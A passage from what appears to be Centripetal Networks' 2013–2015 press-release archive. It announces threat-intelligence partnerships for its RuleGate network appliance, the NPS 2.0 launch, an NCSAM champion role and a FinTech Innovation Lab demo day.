exchange—AlienVault USM delivers a unified, simple and affordable solution for threat detection and compliance management. AlienVault is a privately held company headquartered in Silicon Valley and backed by Trident Capital, Kleiner Perkins Caufield & Byers, GGV Capital, Intel Capital, Sigma West, Adara Venture Partners, Top Tier Capital and Correlation Ventures. For more information, visit https://www.alienvault.com. AlienVault, Open Threat Exchange and Unified Security Management are trademarks of AlienVault. All other company and product names mentioned are used only for identification purposes and may be trademarks or registered trademarks of their respective companies. --- ### [Cyveillance Partners with Centripetal Networks Inc](https://www.centripetal.ai/company/press/cyveillance-centripetal-networks) Published: 2015-03-09 Summary: High-performance RuleGate® appliance operationalizes industry-leading threat intelligence from Cyveillance to offer enhanced cyber awareness. High-performance RuleGate® appliance operationalizes industry-leading threat intelligence from Cyveillance to offer enhanced cyber awareness. HERNDON, VA - March 9, 2015 Centripetal Networks Inc., the leading provider of Real-Time Active Network Defense solutions, announces their partnership today with Cyveillance, a QinetiQ company and a world leader in cyber intelligence. This partnership will deliver actionable cyber threat intelligence to organizations across all industries by enabling Centripetal’s high-performance RuleGate® platform to leverage Cyveillance’s advanced threat intelligence streams. Developed over more than 15 years of continuous innovation, the Cyveillance platform combines web crawling, search engines, APIs, social media, and underground sources to provide actionable intelligence. This global, language-agnostic collection platform provides a unique range of data compared to simple social-monitoring or web-search tools. Cyveillance’s team of security analysts and experts use the data to identify and analyze threats from around the world, turning unique data into rich, insightful intelligence. Data feeds from Cyveillance include real-time, specific intelligence about high-risk hosts, domain names, websites, malicious payloads, and IP addresses. Centripetal’s RuleGate appliance is an Active Network Defense system with real-time attack visualizations and analytics. RuleGate devices are used to protect networks from cyber threats such as malware, malicious users, spam, phishing, scanning, and multiple adversaries. The RuleGate offers cyber analysts full visibility into which hosts are communicating from inside the network to specific hosts outside the network, in real-time. RuleGate is the key component of Centripetal’s Network Protection System, a fully integrated Active Network Defense platform that includes Centripetal’s full line of hardware and software solutions. Through the integration of Cyveillance’s cyber intelligence with the RuleGate platform, organizations can activate large-scale policies in seconds while applying million-scale unique indicators to every packet entering and leaving the network, all without creating any degradation in network performance. Centripetal Networks utilizes Cyveillance’s Phishing URL, Malicious URL, and suspect domain name feeds, which the RuleGate then operationalizes to enable organizations to block, alert, or allow threats in real-time. This helps to prevent data theft on organizations’ networks before it occurs. “We’re pleased to be partnering with Centripetal Networks to bring our threat intelligence capabilities and expertise to their clients,” said Scott Kaine, President of Cyveillance. “With the ever-growing number of attacks that make it past traditional perimeter security systems and devices, it is critical for organizations to get advance knowledge of potential threats through open source threat intelligence. The combination of our cyber intelligence feeds with Centripetal Networks’ platform gives organizations the means to better prepare for and protect against these threats.” “Cyveillance’s industry-leading cyber intelligence serves as a critical component to the Centripetal Networks solution,” said Steven A. Rogers, Founder and CEO of Centripetal Networks. “It is this sort of comprehensive intelligence that enables our RuleGate system to provide organizations with the most-advanced, instantaneous data correlation available.” Cyveillance and Centripetal will host a joint webinar on April 9 on “Keeping Up to Date in an Ever-Changing Security Landscape.” This presentation will explore the challenges in closing the breach detection gap, managing large dynamic sets of threat intelligence, and how to operationalize threat intelligence in a perimeter defense strategy. Register at https://www.cyveillance.com/home/resources/webcasts/ About Centripetal Centripetal Networks Inc. is a cyber-security solutions provider specializing in Real-Time Active Network Defense. Centripetal has achieved several breakthroughs in the scale and speed of network protection. Centripetal’s RuleGate® product is the first and only system able to action threat indicators at scale, at full line-rate speed, and with agility. Threat intelligence can now directly drive an active cyber defense without negatively impacting network performance or user experience. Centripetal’s offering includes the RuleGate® a unique ultra high performance network appliance, QuickThreat® the industry’s first real-time threat visualization and analytics platform, and the Advanced Cyber Threat™ (ACT) service. About Cyveillance Cyveillance, a world leader in cyber intelligence, provides an intelligence-led approach to security. Through continuous, comprehensive Internet monitoring and sophisticated intelligence analysis, Cyveillance proactively identifies and eliminates threats to information, infrastructure, individuals and their interactions, enabling its customers to preserve their reputation, revenues, and customer trust. Cyveillance serves the Global 2000 and OEM Data Partners – protecting the majority of the Fortune 50, regional financial institutions nationwide, and more than 100 million global consumers through its partnerships with security and service providers that include Blue Coat, AOL and Microsoft. Cyveillance is a wholly-owned subsidiary of QinetiQ. For more information, visit https://www.Cyveillance.com. About QinetiQ A FTSE250 company, QinetiQ uses its world class knowledge, research and innovation to provide high-end technical expertise and advice, to customers in the global aerospace, defense and security markets. QinetiQ’s unique position enables it to be a trusted partner to government organizations, predominantly in the UK and the US, including defense departments as well as other international customers in targeted sectors. For more information, visit https://www.QinetiQ.com. --- ### [Leveraging Verisign's iDefense Security Intelligence Services](https://www.centripetal.ai/company/press/centripetal-verisigns-idefense-security) Published: 2014-11-13 Summary: Centripetal Networks Leverages Verisign's iDefense Security Intelligence Services for their RuleGate® Appliance Centripetal Networks Leverages Verisign's iDefense Security Intelligence Services for their RuleGate® Appliance RuleGate® appliance operationalizes industry-leading threat intelligence from the Verisign iDefense Service to provide enhanced cyber awareness and network protection. HERNDON, VA - November 11, 2014 Centripetal Networks announces today that they have partnered with VeriSign, Inc. to integrate Verisign iDefense® Security Intelligence Services into their ultra-high-performance network appliance, the RuleGate®. Integrating Versign’s iDefense Security Intelligence Services into the RuleGate will enable organizations to operationalize iDefense threat intelligence in real-time at full duplex, without disrupting network performance or user experience. Verisign iDefense Security Intelligence Services deliver actionable intelligence and analysis of vulnerabilities - including unpublished zero-day vulnerabilities collected from over 30,000 products and 400 technology vendors - malicious code and geopolitical threats to assist organizations with protecting their network from cyber-attacks. Verisign iDefense leverages a global intelligence-gathering network, proven methodology and highly skilled security professionals to provide customers with access to vulnerability information and intelligence on emerging security threats, as well as recommendations for mitigation. This integration will enable Centripetal Networks’ RuleGate appliance to operationalize iDefense’s advanced threat intelligence and apply million-scale unique threat indicators to every packet entering and exiting the customer network in real-time - at scale without disrupting network performance. These intelligence-based alerts can then be input into leading SIEM tools. Outbound threat monitoring enables immediate identification of specific compromised hosts attempting to dynamically extract data from the customer’s network. RuleGate enforces these extremely large customer policies in real-time while incurring latencies of less than 10 microseconds. This level of performance enables organizations to block attacks before they occur, creating total enhanced cyber awareness. Key features of the integration include: automation of threat prioritization based on severity, business criticality, and relevance to the organization. Enablement of organizations to block, alert, or allow cyber threats on the network in real-time. Ongoing monitoring and analysis of threats with a sustained view of the threat lifecycle enforcement of large-scale policies without disruption of network speed or function. “By integrating with partners like Verisign, we can bring the practice of an active cyber defense to life, creating a more secure network environment,” said Steven A. Rogers, Centripetal Networks founder and CEO. “This form of threat intelligence can populate the system with known threat actors and allow the RuleGate to run at a scale where we can stop data theft before it occurs. The integration with iDefense brings a new level of security intelligence to our appliance and, in turn, makes both products stronger.” Centripetal Networks provides the RuleGate appliance as part of their Network Protection System, a fully integrated Active Network Defense Platform. This system includes the RuleGate appliance along with the QuickThreat®, Advanced Cyber Threat™ Service, RuleGate® Manager and Policy Manager applications. With the Network Protection System comes ease in changing, adding and maneuvering the rule sets, enhancing user experience and cyber awareness. Flexible deployment options allow for the most advanced, instantaneous data correlation available. For more information on the RuleGate appliance or Centripetal Networks’ other Network Protection products, please visit: https://centripetal.ai. For more information on Verisign iDefense Security Intelligence Services, please visit: https://www.verisigninc.com/iDefense. About Centripetal Centripetal Networks Inc. is a cyber-security solutions provider specializing in Real-Time Active Network Defense. Centripetal has achieved several breakthroughs in the scale and speed of network protection. Centripetal’s RuleGate® product is the first and only system able to action threat indicators at scale, at full line-rate speed, and with agility. Threat intelligence can now directly drive an active cyber defense without negatively impacting network performance or user experience. Centripetal’s offering includes the RuleGate® a unique ultra high performance network appliance, QuickThreat® the industry’s first real-time threat visualization and analytics platform, and the Advanced Cyber Threat™ (ACT) service.     --- ### [Integrating ThreatTrack Security's ThreatIQ to RuleGate®](https://www.centripetal.ai/company/press/centripetal-rulegate-threattrack) Published: 2014-11-04 Summary: Centripetal Networks Inc. Integrates ThreatTrack Security's ThreatIQ Service to RuleGate® Appliance Centripetal Networks Inc. Integrates ThreatTrack Security's ThreatIQ Service to RuleGate® Appliance High-performance RuleGate® appliance operationalizes industry-leading threat intelligence from the ThreatIQ service to heighten cyber defenses. RESTON, VA - November 04, 2014 Centripetal Networks Inc., the leading provider of Real-Time Active Network Defense solutions, has just announced today that they are in partnership with ThreatTrack Security, a leader in cyber threat prevention solutions that substantially change how organizations respond to cyber attacks. The signed OEM agreement enables Centripetal’s high-performance RuleGate® device to leverage an advanced threat intelligence stream from ThreatTrack Security’s ThreatIQ™ cloud-based threat intelligence service. ThreatIQ, provided by ThreatTrack Security Inc., is a comprehensive malware intelligence service that gives clients access to an up-to-the-minute stream of malicious URLs and IP addresses, phishing links, infected files and additional intelligence that is processed by the ThreatTrack Security Labs. ThreatIQ provides real-time insight into emerging threats, enhancing enterprises’ security defenses in an increasingly complex threat landscape. ThreatTrack Security is one of the largest data-sharing companies in the world and will serve as a critical component to the Centripetal Networks solution. Centripetal’s RuleGate® appliance is a Real-Time Active Network Defense system that is used to protect networks from cyber threats such as malware, malicious users, spam, phishing, scanning, and multiple adversaries. The RuleGate® offers cyber analysts full visibility into which hosts are communicating from inside the network to specific hosts outside the network, in real-time. Two or more RuleGate®s in a high availability configuration can guarantee continuous operation during maintenance, upgrades, or unexpected failures, without impacting the network. With ThreatIQ, Centripetal Networks can ensure that the deployed RuleGate® appliances are further securing customers’ networks with the latest malware threat streams. The ThreatIQ service provides raw data that is categorized by identified threats, behavioral traits, and malware relationships. It can also generate reports that consist of information on malicious files, sites, email and other Internet traffic known to spread malicious codes. ThreatTrack Security, like Centripetal, recognizes that time is of the essence in cyber defense; every second counts. Centripetal Networks’ integration of ThreatIQ on the RuleGate® will allow for the application of million-scale unique indicators on every packet entering and exiting the network. The RuleGate® operationalizes this malware intelligence enabling organizations to block, alert, or allow cyber threats in real-time at scale without any disruption to the network performance. With millions of malicious users hiding amongst billions of legitimate users, it is no wonder cyber security is at the forefront of organization’s priorities. A security breach in the network could have detrimental effects to both businesses’ reputations as well as customer’s personal data, no matter how brief the breach may be. By integrating ThreatIQ with the RuleGate® device, organizations can operationalize threat intelligence and activate large-scale policies in seconds, all while allowing business operations to continue without loss in performance. "The cyber threat landscape is ever-changing, ever-expanding”, said Steven A. Rogers, Founder and CEO of Centripetal Networks. “Persistent threats require persistent protection and an integration with ThreatTrack Security’s best in class malware intelligence and Centripetal's RuleGate appliance will offer organizations a highly-advanced solution in cyber defense. The addition of ThreatIQ will greatly increase data security in real-time, without disrupting user experience.” “Centripetal Networks recognizes that threat intelligence plays an increasingly vital role in organizations’ ability to detect and respond to cyberattacks,” said Julian Waits, Sr., president and CEO of ThreatTrack Security. “By integrating ThreatIQ into their RuleGate solution, they are delivering a much stronger and more agile cyber defense to their customers.” About Centripetal Centripetal Networks Inc. is a cyber-security solutions provider specializing in Real-Time Active Network Defense. Centripetal has achieved several breakthroughs in the scale and speed of network protection. Centripetal’s RuleGate® product is the first and only system able to action threat indicators at scale, at full line-rate speed, and with agility. Threat intelligence can now directly drive an active cyber defense without negatively impacting network performance or user experience. Centripetal’s offering includes the RuleGate® a unique ultra high-performance network appliance, QuickThreat® the industry’s first real-time threat visualization and analytics platform, and the Advanced Cyber Threat™ (ACT) service. About ThreatTrack Security Inc. ThreatTrack Security specializes in helping organizations identify and stop Advanced Persistent Threats (APTs), targeted attacks and other sophisticated malware designed to evade the traditional cyber defenses deployed by enterprises and government agencies around the world. With more than 300 employees worldwide and backed by Insight Venture Partners and Bessemer Venture Partners, the company develops advanced cyber security solutions that Expose, Analyze and Eliminate the latest malicious threats, including its ThreatSecure advanced threat detection and remediation platform, ThreatAnalyzer malware behavioral analysis sandbox, ThreatIQ real-time threat intelligence service, and VIPRE business antivirus endpoint protection. Learn more at ThreatTrack security © 2014 Centripetal Networks, Incorporated. All rights reserved. Centripetal, the Centripetal logos, RuleGate and QuickThreat are trademarks or registered trademarks of Centripetal Networks, Inc. in the United States and/or other countries. --- ### [Centripetal Becomes NCSAM 2014 Champion](https://www.centripetal.ai/company/press/cyber-security-awareness-month-2014) Published: 2014-10-01 Summary: Today, Centripetal Networks announced that it has become a Champion of National Cyber Security Awareness Month (NCSAM) 2014. Centripetal Networks Becomes National Cyber Security Awareness Month 2014 Champion RESTON, VA - October 1, 2014 Awareness is raised to assist consumers in securing data online; Centripetal Networks joins the effort. Today, Centripetal Networks announced that it has become a Champion of National Cyber Security Awareness Month (NCSAM) 2014, joining a growing global effort among colleges and universities, businesses, government agencies, associations and non-profit organizations to promote online safety awareness. Celebrated every October, National Cyber Security Awareness Month was created as a collaborative effort between government and industry to ensure everyone has the resources needed to stay safer and more secure online. As an official Champion, Centripetal Networks recognizes its commitment to cyber security and online safety. “We are excited to join NCSAM in their cyber awareness efforts this October,” said Centripetal Networks founder and CEO Steven A. Rogers. “Cyber security has come a long way over the years, but we are still not adequately defending ourselves. The missing element in previous cyber threat intelligence appliances is that they were unable to scale sufficiently to address the problem. That is exactly what we have set out to combat at Centripetal. What NCSAM is doing is crucial to bring this growing issue into the forefront.” Coordinated and led by the National Cyber Security Alliance (NCSA) and the Department of Homeland Security, NCSAM has grown exponentially since its inception, reaching consumers, small and medium-sized businesses, corporations, educational institutions and young people across the nation and internationally. This year marks the 11th year of NCSAM. "The Champion Program is a vital part of making National Cyber Security Awareness Month a success each year,” said Michael Kaiser, executive director of the National Cyber Security Alliance. “We are thankful to our 2014 Champion organizations for their support and commitment to our shared responsibility of promoting cyber security and online safety awareness." As part of Centripetal Networks’ NCSAM efforts, we will continue to discuss the growing issue of cyber crime and how to best prevent data theft before it occurs. Centripetal’s RuleGate® device operationalizes threat intelligence to enable organizations to block, alert, or allow cyber threats in real-time at scale, without network disruption. This results in total enhanced cyber awareness. For more information about National Cyber Security Awareness Month, the NCSAM Champions program, and how to participate in NCSAM activities, visit https://www.staysafeonline.org/ncsam. You can also follow and use the #NCSAM hashtag on Twitter throughout the month. About Centripetal Centripetal Networks Inc. is a cyber-security solutions provider specializing in Real-Time Active Network Defense. Centripetal has achieved several breakthroughs in the scale and speed of network protection. Centripetal’s RuleGate® product is the first and only system able to action threat indicators at scale, at full line-rate speed, and with agility. Threat intelligence can now directly drive an active cyber defense without negatively impacting network performance or user experience. Centripetal’s offering includes the RuleGate® a unique ultra high performance network appliance, QuickThreat® the industry’s first real-time threat visualization and analytics platform, and the Advanced Cyber Threat™ (ACT) service. Please visit www.centripetalnetworks.com About National Cyber Security Awareness Month Now in its 11th year, NCSAM is designed to engage and educate public and private sector partners through events and initiatives with the goal of raising awareness about cyber security in order to increase the resiliency of the nation in the event of a cyber incident. Since President Obama’s proclamation establishing NCSAM in 2004, NCSAM has been formally recognized by Congress, federal, state and local governments and leaders from industry and academia. This united effort is necessary to maintain a cyberspace that is safer, more resilient and remains a source of tremendous opportunity and growth for years to come. For more information, visit https://www.staysafeonline.org/ncsam or https://www.dhs.gov/national-cyber-security-awareness-month. About The National Cyber Security Alliance The National Cyber Security Alliance is a non-profit organization whose mission is to educate and empower a digital citizenry to use the Internet securely and safely through collaboration with the government, corporate, non-profit and academic sectors. As we believe cyber security is our shared responsibility, the NCSA is dedicated to providing industries, communities and individuals with the tools and resources to protect themselves and the digital assets we all share. Learn more at https://www.staysafeonline.org. About STOP. THINK. CONNECT. STOP. THINK. CONNECT. is the global cyber security awareness campaign to help all digital citizens stay safer and more secure online. The campaign was created by an unprecedented coalition of private companies, non-profits and government organizations with leadership provided by the National Cyber Security Alliance (NCSA) and the Anti-Phishing Working Group (APWG). The Department of Homeland Security leads the federal engagement in the campaign. Learn how to get involved at the STOP. THINK. CONNECT. Facebook page at https://www.facebook.com/STOPTHINKCONNECT, on Twitter at @STOPTHNKCONNECT, and at https://www.stopthinkconnect.org. --- ### [Centripetal Networks Introduces Networks Protection System 2.0](https://www.centripetal.ai/company/press/centripetal-networks-protection-system-2-0) Published: 2014-09-24 Summary: Centripetal Networks Inc. Introduces Networks Protection System 2.0 Integrated High Performance Cyber Defense Platform. Centripetal Networks Inc. Introduces Networks Protection System 2.0 Integrated High Performance Cyber Defense Platform Enterprise class Network Protection System 2.0 enable millions of cyber intelligence indicators in real-time. RESTON, VA - September 24, 2014 Centripetal Networks Inc. has announced the launch of their Network Protection System (NPS) 2.0 this week. NPS is an Active Network Defense platform that fully integrates Centripetal’s hardware and software systems and operationalizes threat intelligence through partnerships with industry-leading threat intelligence providers. This new system release provides updates to both the RuleGate® appliance and the QuickThreat® application, but also introduces the RuleGate® Manager and Policy Manager systems as well as the Advanced Cyber Threat™ (ACT) subscription service. Centripetal’s RuleGate® is a Real-Time Active Network Defense system that is used to protect networks from cyber threats such as malware, malicious users, spam, phishing, scanning, and multiple adversaries. The RuleGate® enables the use of millions of threat indicators with ultra low latencies enabling full network performance and user experience. Users are now able to visualize data theft attempts on the network using the RuleGate®’s breakthrough logging application, QuickThreat®. As each attack is detected and blocked, the RuleGate® produces a real-time information feed of the threats. This data is then presented in Centripetal Networks QuickThreat® visualization tool and enables threat intelligence-based alerts to be analyzed in real time. NPS 2.0 is actively being run during Centripetal’s Network Threat Assessments, a managed service that utilizes the QuickThreat® software for an on-site assessment of the customer’s existing network security stack. Centripetal Networks also offers services such as the ACT™ subscription service, which includes over 500,000 unique threat indicators and has a feed that is automatically updated and improved each day. Many open-source and advanced threat feeds are available, encompassing a very high percentage of the entire known threat. Once the attackers are known, their information can be loaded into a RuleGate® device where policies can be implemented automatically to defend the network, with virtually no effect on its performance. This service is a new feature to the Centripetal Networks NPS 2.0 and provides even more insight into threat intelligence feeds for analysts. Also new to the Centripetal Networks NPS are the RuleGate® Manager and the Policy Manager applications. The RuleGate® Manager gives system administrators full visibility into the status and health of their deployed RuleGate® systems. Security Audit Logs maintain accountability and ensure that all transactions, including policy changes, are tracked and available for review. The Hardware System Status feature helps maintain the RuleGate® system with the highest levels of service by monitoring CPU Load, Memory Usage, Power Supply Status, and Critical System Temperatures. Meanwhile, the new Policy Manager application enables organizations to build, maintain, and enforce cyber-security policies to meet the needs of each individual organization. Centripetal’s integration with industry-leading threat intelligence partners, customer specific intelligence sources, and the ACT™ subscription service gives organizations the capability to design their own policies using dynamic threat intelligence. Until now, improving policy effectiveness was labor intensive and opened the network up to risk. With NPS 2.0 comes ease in changing, adding and maneuvering the rule sets, enhancing user experience and cyber awareness. With cyber crime on the rise, the Centripetal team understands the importance of a complete cyber defense solution that can protect your network at the scale of the Internet. "Persistent Threats require Persistent Protection," said Steven A. Rogers, founder and CEO of Centripetal Networks. With Centripetal Networks’ NPS 2.0, organizations will be able to design policies that can block, alert, or allow every single packet that is entering or exiting the network, without impacting network performance. The scale and speed of NPS 2.0 is vitally important to risk management because every packet and every microsecond counts in terms of cyber security. With this level of security, many recent attacks could have been prevented. This system is ideal for financial services firms, critical infrastructure operators, Internet service providers, government agencies, and enterprises that place a high priority on protecting their data. The NPS 2.0 is a great advancement for Centripetal Networks and is currently deployed on their own network as well at various Fortune 500 enterprises. The Centripetal team set out to create a product that is capable of operating at Internet-scale and has accomplished that with the release of their NPS 2.0 system. About Centripetal Centripetal Networks Inc. is a cyber-security solutions provider specializing in Real-Time Active Network Defense. Centripetal has achieved several breakthroughs in the scale and speed of network protection. Centripetal’s RuleGate® product is the first and only system able to action threat indicators at scale, at full line-rate speed, and with agility. Threat intelligence can now directly drive an active cyber defense without negatively impacting network performance or user experience. Centripetal’s offering includes the RuleGate® a unique ultra high performance network appliance, QuickThreat® the industry’s first real-time threat visualization and analytics platform, and the Advanced Cyber Threat™ (ACT) service. --- ### [Centripetal adds to their RuleGate® Appliance](https://www.centripetal.ai/company/press/centripetal-emerging-threats-rulegate) Published: 2014-08-14 Summary: Centripetal Networks Inc. Adds Emerging Threats IQRisk® Rep List and IQRisk Query for Their RuleGate® Appliance Centripetal Networks Inc. Adds Emerging Threats IQRisk® Rep List and IQRisk Query for Their RuleGate® Appliance OEM Agreement Leverages Centripetal Networks’ High-performance TCP/IP RuleGate® appliance with a Comprehensive IP and Domain Reputation List. LAFAYETTE, Ind. - August 19, 2014 (BUSINESS WIRE)--Emerging Threats, a world-leading provider of commercial and open source threat intelligence, today announced that Centripetal Networks Inc. has licensed the IQRisk® Rep List and IQRisk Query products. Centripetal Networks, a leading provider of Real-Time Active Network Defense systems, will integrate Emerging Threats IQRisk Rep List into its RuleGate® appliances. This will enable enterprises to operationalize all of the IQRisk® intelligence in real time and at full network performance. Centripetal’s RuleGate® is an Active Network Defense system that is used to protect networks from cyber threats such as malware, malicious users, cyber criminals, and hostile governments. RuleGate®s are inline bump-in-the-wire devices located at network security boundaries. RuleGate®s can block, alert, or allow every packet crossing the boundaries, in either direction, according to the dynamic threat intelligence and user defined security policies. The RuleGate’s breakthrough performance enables the use of millions of threat indicators. Centripetal will leverage the comprehensive IQRisk Rep List to dynamically block malicious IP addresses and threat indicators using the RuleGate®. The IQRisk Rep List is based on Emerging Threats’ extensive data collection and analysis and contains over 40 categories of reputation. IQRisk Rep List is an actionable IP reputation and domain list that contains hundreds of thousands of currently malicious IP addresses and domains that allow users to take proactive measures to block list these threats and make informed decisions. All the threat intelligence data in Emerging Threats products and solutions are gathered through global resources that are exclusively collected and managed by Emerging Threats. This enables Emerging Threats to proactively deliver accurate and trusted data to OEMs and enterprise customers. With the RuleGate, enterprises no longer have to pick only a small subset of threat intelligence to act upon. All of the advanced IQRisk threat data can be used to strengthen an enterprise’s defense. The RuleGate’s breakthrough logging performance enables, for the first time, a real-time view of network threats. This data is presented in Centripetal Networks QuickThreat™ visualization and analytics tool. QuickThreat™ enables threat intelligence-based alerts from IQRisk Rep List to be investigated in real time without the need for any post processing. QuickThreat™ can be installed on Windows and Mac PCs as well as Linux servers for enterprise applications. In addition to IQRisk Rep List, Centripetal Networks has also licensed IQRisk Query, a robust and intuitive Web-based threat intelligence portal and API that provides easy access to the largest and most comprehensive threat intelligence database with up to 4 years of historical and contextual threat data. Centripetal will use IQRisk Query to enable security operations teams to triage threats in real time with risk-based alerting. “Enterprise cyber threats are dynamic and expanding,” said Steven Rogers, CEO of Centripetal Networks. “With world-class threat intelligence from Emerging Threats and Centripetal's RuleGate appliance, enterprises have a powerful way to operationalize threat intelligence, without impacting network performance. The addition of IQRisk data provides a significant boost to an enterprise’s real-time active network defense.” “Today’s business and networking environments demand security solutions that are able to analyze high volumes of traffic at gigabit speeds,” said Ken Gramley, CEO, Emerging Threats. “We are pleased that Centripetal Networks has chosen our IQRisk products to meet the needs of their customers by providing a high-performance system with solid, time-tested IP and domain reputation data to ensure networks are safe from these threats.” About Emerging Threats Emerging Threats is a world-leading provider of commercial and open source threat intelligence. Founded in 2003 as a cyber security research community, Emerging Threats has become the de facto standard in network-based malware threat detection. The company’s ETOpen Ruleset, ETPro® Ruleset, and IQRisk® Suite of threat intelligence are platform agnostic for easy integration with Suricata, SNORT®, and other network intrusion protection and detection systems. With ETPro Ruleset, organizations can achieve the highest standards of malicious threat detection with world-class support and research for extended vulnerability coverage. ETPro Ruleset is ideal for enterprises, government agencies, financial institutions, SMBs, higher education, and service providers. For more information, please visit https://www.emergingthreats.net About Centripetal Networks Centripetal Networks Inc. has developed an entirely new category for cyber-security solutions: Real-Time Active Network Defense. Centripetal has achieved several breakthroughs in the scale and speed of network protection. Centripetal’s RuleGate® product is the first and only system able to action threat indicators at scale, at full line-rate speed, and with agility. Threat intelligence can now directly drive an active cyber defense without negatively impacting network performance or user experience. Centripetal’s offering includes the RuleGate®, a unique ultra high performance network appliance, QuickThreat™ the industry’s first real-time threat visualization and analytics platform, and the Advanced Cyber Threat (ACT)™ service.   --- ### [CrowdStrike Launches Intelligence Exchange Program](https://www.centripetal.ai/company/press/crowdstrike-intelligence-exchange-program) Published: 2014-08-05 Seven industry-leading solutions join program to provide rich context and attack prioritization to end customers. August 5, 2014 - IRVINE, Calif. PRNewswire - CrowdStrike Inc.™, a global provider of security technologies and services focused on identifying advanced threats and targeted attacks, today announced the launch and immediate availability of the CrowdStrike Intelligence Exchange Program (CSIX). CrowdStrike Intelligence Exchange (CSIX) enables vendor partners to access and share threat intelligence. This threat intelligence continuously improves vendor partners' ability to detect and attribute attacks, allows for attack prioritization, and provides the end customer with rich context about the attacks in their environment. "We are thrilled to launch the CrowdStrike Intelligence Exchange program and look forward to adding additional partners to a growing list of industry-leading solutions," says Scott Fuselier, VP of WW Sales & Operations. "With today's ever-changing threat landscape, it's more important than ever to be able to gain context and prioritization into targeted attacks." CSIX launches with seven industry-leading partners: Agiliance, Centripetal Networks, Check Point Software Technologies, Ltd., General Dynamics Fidelis Cybersecurity Solutions, LogRhythm, ThreatQuotient, and ThreatStream. Security solution vendors can add rich context and attack prioritization through three go-to-market program options: Option 1: CrowdID OEM Partner can deliver basic attribution to help their customer understand if an attack is targeted or commodity, free of charge. The OEM Partner queries the CrowdStrike API with supported indicators and/or submits a malware sample receiving attribution information. Option 2: Falcon Intelligence - Adversary Profile Attribution data is made available to the OEM Partner's solution to provide rich context and prioritization of targeted attacks. Content delivered to the customer includes both adversary name and full profile details, including targeted sectors, exploits used, and other trend data, under a license and revenue sharing model. Option 3: Falcon Intelligence Connect CrowdStrike and the OEM Partner certify the integration of CrowdStrike Intelligence to the OEM Partner's solution for use with joint customers. "In the fight against malicious actors, threat intelligence can be the difference between a massive breach and attempted attack," said Peter George, president of General Dynamics Fidelis Cybersecurity Solutions. "Customers will be better able to protect their systems with the increased scope of intelligence we can provide as a result of our participation in the Intelligence Exchange. The integration through Fidelis XPS enables threat detection and remediation to be operationalized, with the new intelligence applied in real time." Becoming a Partner: CSIX is the first program of many collaborative CrowdStrike partnerships within the security vendor community. CrowdStrike is committed to building an ecosystem that enhances the defensive posture and response capabilities of our customers. Participation in CSIX provides OEM Partners with multiple options to better enhance their offering with contextual information specific to major threat actors. For more information, visit CSIX @ CrowdStrike CSIX Partners: Agiliance Agiliance, the Big Data Risk Company, is the leading independent provider of integrated solutions for Operational and Security Risk programs. Centripetal Networks Centripetal Networks is a cyber-security solutions provider specializing in Active Network Defense. Centripetal's RuleGate® operationalizes threat intelligence at scale, which drives an active cyber defense without impacting network performance. Check Point Software Technologies, Ltd. Check Point Software Technologies, the worldwide leader in securing the Internet, provides customers with uncompromised protection against all types of threats, reduces security complexity, and lowers total cost of ownership. Check Point offers flexible and simple solutions that can be customized to meet an organization's exact security needs. General Dynamics Fidelis Cybersecurity Solutions General Dynamics Fidelis Cybersecurity Solutions offers a comprehensive portfolio of products, services, and expertise to combat today's sophisticated advanced threats and prevent data breaches. LogRhythm LogRhythm's award-winning Security Intelligence Platform, unifying SIEM, log management, network forensics, host forensics, and advanced analytics, empowers organizations to detect and respond to today's most sophisticated threats with unparalleled speed and accuracy. ThreatQuotient ThreatQuotient is an on-premise, vendor-agnostic threat intelligence management appliance that automates network defense workflows. Detect adversaries more quickly through streamlined threat intel lifecycles that automatically deploy to your enterprise security environment. ThreatStream ThreatStream offers the first-ever community-vetted cyber security intelligence platform that aggregates millions of threat indicators from around the Internet and integrates them directly to an organization's existing security infrastructure. ThreatStream provides businesses and governments visibility into newly discovered security threats so they can proactively defend against malicious attacks. About CrowdStrike CrowdStrike is a global provider of security technology and services focused on identifying advanced threats and targeted attacks. Using big-data technologies, CrowdStrike's next-generation threat protection platform leverages real-time Stateful Execution Inspection (SEI) at the endpoint and Machine Learning in the cloud instead of solely focusing on malware signatures, indicators of compromise, exploits, and vulnerabilities. The CrowdStrike Falcon Platform is a combination of big-data technologies and endpoint-security driven by advanced threat intelligence. CrowdStrike Falcon enables enterprises to identify unknown malware, detect zero-day threats, pinpoint advanced adversaries and attribution, and prevent damage from targeted attacks in real time. To learn more, please visit CrowdStrike --- ### [New York's 2013 FinTech Innovation Lab "Demo Day"](https://www.centripetal.ai/company/press/fintech-innovation-lab-demo-day-2013) Published: 2013-07-11 Summary: Innovative tech companies demonstrated their products and services today at the third annual FinTech Innovation Lab “Demo Day” in New York. Entrepreneurs Showcase Cutting-Edge Financial Technology Solutions at New York's 2013 FinTech Innovation Lab "Demo Day" FinTech Lab’s Goal of Job Creation and Expansion of FinTech Industry in New York City Continues to be Achieved. A select group of innovative technology companies demonstrated their products and services to dozens of top executives in financial services, venture capital and technology today at the third annual FinTech Innovation Lab “Demo Day” in New York. The Lab is a program for entrepreneurs currently developing innovative technologies targeted to the financial services sector, particularly in the areas of data analytics, technology infrastructure, payments, and security. The goal of the Lab – established in 2010 by Accenture and the Partnership Fund for New York City – is to enhance New York’s role as a leading hub for technology innovation in a variety of sectors, including the financial-services industry; to spur job creation in New York; and to give entrepreneurs an accelerated path to growing their business within financial services. This year’s Demo Day was held at the Credit Suisse headquarters in Manhattan. The graduates from this year’s Lab – Centripetal Networks, Dashlane, Inktank, Narrative Science, OpenFin and ScrollMotion – were selected to participate from among more than 100 early- and growth-stage companies that applied. The six companies, chosen in March by the chief technology officers and other senior technology executives from leading financial services institutions, have spent the last 12 weeks receiving product feedback and mentorship from executives at the world’s biggest banks, leading technology entrepreneurs and venture capital firms. The 2013 FinTech Innovation Lab graduates are: Centripetal Networks – which has created a highly scalable and advanced cyber security solution, including a network-based security appliance and other applications and services. The company partners with leading university research centers, network scientists, mathematicians and government agencies to build the underlying components and algorithms. Dashlane – whose self-named Dashlane product is a secure digital wallet and password manager for nearly every device. It uses advanced real-time semantic analysis to autofill forms on virtually any webpage, enabling keyboard-less checkouts, registrations and logins. The digital wallet stores nearly any payment type and can be used on any website with any major operating system with no merchant integration required. Inktank – which provides data storage solutions based on the emerging open-source storage platform Ceph. Launched by some of Ceph’s leading developers, Inktank helps organizations leverage Ceph to lower storage costs by freeing them from restrictive and expensive proprietary storage systems. Narrative Science– a business-intelligence company whose patented artificial intelligence engine automatically analyzes data and produces narratives that can be easily read and understood. The technology can be applied to rapidly generate texts based on vast data for things like compliance reports, portfolio summaries and market recaps. OpenFin – whose software enables financial services firms 